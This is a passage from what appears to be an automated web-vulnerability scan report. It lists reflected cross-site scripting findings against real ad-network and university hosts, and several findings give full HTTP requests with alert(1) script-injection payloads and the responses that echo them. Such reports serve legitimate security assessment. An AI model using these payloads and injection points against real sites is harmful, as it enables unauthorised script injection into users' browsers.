if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"d9b47<script>alert(1)</script>c2908fe773b", c6:"", c10:"", c15:"", c16:"", r:""});



6.95. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload e0d71<script>alert(1)</script>e06bf299a95 was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=6864322&c3=&c4=&c5=&c6=e0d71<script>alert(1)</script>e06bf299a95&c10=&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://web.adblade.com/impsc.php?cid=1083-2742610312&output=html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Sun, 18 Sep 2011 02:41:09 GMT
Date: Sun, 04 Sep 2011 02:41:09 GMT
Content-Length: 1234
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"6864322", c3:"", c4:"", c5:"", c6:"e0d71<script>alert(1)</script>e06bf299a95", c10:"", c15:"", c16:"", r:""});



6.96. http://bid.openx.net/json [c parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bid.openx.net
Path:   /json

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 988b0<script>alert(1)</script>f70ef4ad754 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /json?c=OXM_41207221382988b0<script>alert(1)</script>f70ef4ad754&pid=05eaa309-64d4-c0a7-d349-bc1b1d68d17f&s=728x90&f=0.85&url=http%3A%2F%2Fwww.ndtv.com%2Farticle%2Findia%2Fturkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917&cid=oxpv1%3A34-632-1929-2023-5730&hrid=edb2a1dc7ff395103b661a785688d648-1315103288 HTTP/1.1
Host: bid.openx.net
Proxy-Connection: keep-alive
Referer: http://d.tradex.openx.com/afr.php?zoneid=5730&cb=1737249030&ct0=http://oasc12.247realmedia.com/RealMedia/ads/click_lx.ads/ndtv.com/ROS/L12/1737249030/Top/Martini/Openx_05182011_ron__051811_260/openx_728_leader2.html/4d686437616b356934616b41434d6658?http://msite.martiniadnetwork.com/action/track/type/0/pid/1000000986802/sid/1000005169510/loc/http%3A//www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917//pubclick//Martini/Openx_05182011_ron__051811_260/pos/Top/page/ndtv.com/ROS/L12/ord/1737249030?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: i=d2a43928-76cd-49ea-b899-b41fb371435f

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=utf-8
Cache-Control: no-cache, must-revalidate
P3P: CP="CUR ADM OUR NOR STA NID"
Connection: close
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Set-Cookie: p=1315106851; version=1; path=/; domain=.openx.net; max-age=63072000;

OXM_41207221382988b0<script>alert(1)</script>f70ef4ad754({"r":null});

6.97. http://cps.regis.edu/lp/computer_degree/it_degree.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cps.regis.edu
Path:   /lp/computer_degree/it_degree.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6f2f"><script>alert(1)</script>099e2b27aef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /lp/computer_degree/it_degree.php?c6f2f"><script>alert(1)</script>099e2b27aef=1 HTTP/1.1
Host: cps.regis.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: max-age=1, private, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 13905

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<form id="lp3" action="
                    /lp/computer_degree/it_degree.php?c6f2f"><script>alert(1)</script>099e2b27aef=1"
method="post">
...[SNIP]...

6.98. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66f93"%3balert(1)//3b48d076b2d was submitted in the $ parameter. This input was echoed as 66f93";alert(1)//3b48d076b2d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=&$=66f93"%3balert(1)//3b48d076b2d&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378$767:66f93";alert(1)//3b48d076b2d;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=39:57:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:05 GMT
Content-Length: 5199
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',66f93";alert(1)//3b48d076b2d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,66f93";alert(1)//3b48d076b2d;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                   var hashval = location.hash;
var pubdomain = hashv
...[SNIP]...

6.99. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 86fb0'%3balert(1)//9b7f2112fb9 was submitted in the $ parameter. This input was echoed as 86fb0';alert(1)//9b7f2112fb9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=&$=86fb0'%3balert(1)//9b7f2112fb9&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:aa378$767:86fb0';alert(1)//9b7f2112fb9;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=41:59:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Sun, 04 Sep 2011 02:36:56 GMT
Date: Sun, 04 Sep 2011 02:34:06 GMT
Content-Length: 5199
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat=',86fb0';alert(1)//9b7f2112fb9';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=,86fb0';alert(1)//9b7f2112fb9;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasA
...[SNIP]...

6.100. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ef75'-alert(1)-'7fbf108acb6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d2/jsc/fm.js?5ef75'-alert(1)-'7fbf108acb6=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 958
Content-Type: application/x-javascript
Set-Cookie: FFad=69:28:0:0:0:0:0:47:1:1:0:1]]>>:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=0,0,0:767,4,94:826,471,9:767,4,9:767,4,41:933,56,15:826,471,14:767,4,14:305,825,15:305,825,0:0,825,15:305,0,15:0,0,0]]>>;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=221
Expires: Sun, 04 Sep 2011 04:18:20 GMT
Date: Sun, 04 Sep 2011 04:14:39 GMT
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();

y10.src='http://r1.zedo.com/ads2/p/'+Math.random()+'/ERR.gif?v=bar/v16-504/d2;referrer='+document.referrer+';tag=d7.zedo.com/bar/v16-504/d2/jsc/fm.js;qs=5ef75'-alert(1)-'7fbf108acb6=1;';

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=;z="+Math.
...[SNIP]...

6.101. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 23241"%3balert(1)//334de1eba6b was submitted in the q parameter. This input was echoed as 23241";alert(1)//334de1eba6b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=23241"%3balert(1)//334de1eba6b&$=&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=11:29:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=172
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:03 GMT
Content-Length: 5196
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='23241";alert(1)//334de1eba6b';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=23241";alert(1)//334de1eba6b;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                   var hashval = location.hash;
var pubdomain = hashv
...[SNIP]...

6.102. http://d7.zedo.com/bar/v16-504/d2/jsc/fm.js [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d2/jsc/fm.js

Issue detail

The value of the q request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4142'%3balert(1)//001a6cf669d was submitted in the q parameter. This input was echoed as a4142';alert(1)//001a6cf669d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d2/jsc/fm.js?c=4/2/1&a=0&f=&n=767&r=13&d=14&q=a4142'%3balert(1)//001a6cf669d&$=&s=0&z=0.472774357534945 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFMChanCap=2457780B305,825#722607|0,1#0,24; ZEDOIDX=13; FFMCap=2457900B1185,234056|0,1#0,24; FFcat=1185,589,14:305,825,15; FFad=0:0; PI=h1197692Za1015462Zc1185000589,1185000589Zs76Zt1246Zm1286Zb43199

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=13:31:31:31:31:None:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,471,14:767,4,14:826,471,0:767,4,0:0,4,14:1185,589,14:305,825,15400f7829541bf3ff04cc1481;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "182787-8952-4aa4dd27613c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=171
Expires: Sun, 04 Sep 2011 02:36:55 GMT
Date: Sun, 04 Sep 2011 02:34:04 GMT
Content-Length: 5196
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=0;var zzPat='a4142';alert(1)//001a6cf669d';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=a4142';alert(1)//001a6cf669d;z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd
...[SNIP]...

6.103. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb964'%3balert(1)//edb6405d7c3 was submitted in the $ parameter. This input was echoed as cb964';alert(1)//edb6405d7c3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=cb964'%3balert(1)//edb6405d7c3&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:cb964';alert(1)//edb6405d7c3,f81ab';expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=6:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 04 Sep 2011 02:34:39 GMT
Date: Sun, 04 Sep 2011 02:32:14 GMT
Content-Length: 4591
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='cb964';alert(1)//edb6405d7c3,f81ab'';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=cb964';alert(1)//edb6405d7c3,f81ab';z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311'
...[SNIP]...

6.104. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [$ parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The value of the $ request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd578"-alert(1)-"a6a3f2f621b was submitted in the $ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d8/jsc/fm.js?c=589/122/121&a=0&f=&n=1185&r=13&d=14&q=&$=dd578"-alert(1)-"a6a3f2f621b&s=76&z=0.1346084768883884 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.dnaindia.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZFFBbh=977B826,20|121_977#0; ZFFAbh=977B826,20|121_977#365; FFBbh=977B305,20|149_1#0; FFgeo=5386156; FFAbh=977B305,20|149_1#365; ZEDOIDA=k5xiThcyanucBq9IXvhSGSz5~090311; ZCBC=1; FFSkp=305,825,15,1:; FFcat=305,825,15; FFad=0; FFMChanCap=2457780B305,825#722607|0,1#0,24; PI=h639958Za722607Zc305000825,305000825Zs263Zt1246; ZEDOIDX=13

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1185:dd578"-alert(1)-"a6a3f2f621b,2849e%22%3b63eaba2bfcf,2849e";expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1185,589,14:1185,589,0:0,589,14:305,825,15400f7829e448bcadddbc6079;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=4:31:31:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "4368e0d-8952-4aa4dfbf231c0"
Vary: Accept-Encoding
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=145
Expires: Sun, 04 Sep 2011 02:34:38 GMT
Date: Sun, 04 Sep 2011 02:32:13 GMT
Content-Length: 4657
Connection: close

// Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved.

var y10=new Image();


var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=76;var zzPat='dd578"-alert(1)-"a6a3f2f621b,2849e%22%3b63eaba2bfcf,2849e"';var zzCustom='';var zzTitle='';
if(typeof zzStr=='undefined'){
var zzStr="q=dd578"-alert(1)-"a6a3f2f621b,2849e%22%3b63eaba2bfcf,2849e";z="+Math.random();}

if(zzuid=='unknown')zzuid='k5xiThcyanucBq9IXvhSGSz5~090311';

var zzhasAd=undefined;


                                                                   
...[SNIP]...

6.105. http://d7.zedo.com/bar/v16-504/d8/jsc/fm.js [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d7.zedo.com
Path:   /bar/v16-504/d8/jsc/fm.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2d416'-alert(1)-'40b5877820a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bar/v16-504/d8/jsc/fm.js?2d416'-alert(1)-'40b5877820a=1 HTTP/1.1
Host: d7.zedo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Length: 958
Content-Type: application/x-javascript
Set-Cookie: FFad=16:28:0:0:0:0:0:47:1:1:0:1]]>>:None;expires=Sun, 04 Sep 2011 05:00:00 GMT;domain=.zedo.com;path=/;
